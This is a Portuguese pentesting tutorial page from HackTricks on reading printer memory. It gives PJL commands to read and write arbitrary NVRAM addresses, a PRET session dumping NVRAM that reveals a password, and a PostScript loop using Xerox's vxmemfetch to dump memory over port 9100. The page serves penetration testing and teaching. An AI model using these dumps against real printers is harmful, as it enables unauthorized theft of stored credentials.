hacktricks/network-services-pentesting/pentesting-printers/memory-access.md
2024-12-12 13:56:11 +01:00

3.9 KiB

Aprenda hacking em AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Você pode tentar despejar a NVRAM e extrair informações confidenciais (como senhas) de lá.

Em PJL (Brother), você pode acessar endereços arbitrários da NVRAM usando PJL conforme mostrado abaixo:

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

Você pode testar este ataque usando PRET:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

Alguns modelos de impressoras Xerox possuem um operador proprietário PostScript vxmemfetch incorporado, que permite a um atacante ler endereços de memória arbitrários. Usando um loop PostScript, essa funcionalidade pode ser facilmente usada para despejar toda a memória como mostrado abaixo (o PRET não possui esse ataque, então você precisará enviar esse payload para a porta 9100 em uma conexão nc):

/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat

Mais informações aqui: http://hacking-printers.net/wiki/index.php/Memory_access

Aprenda AWS hacking do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: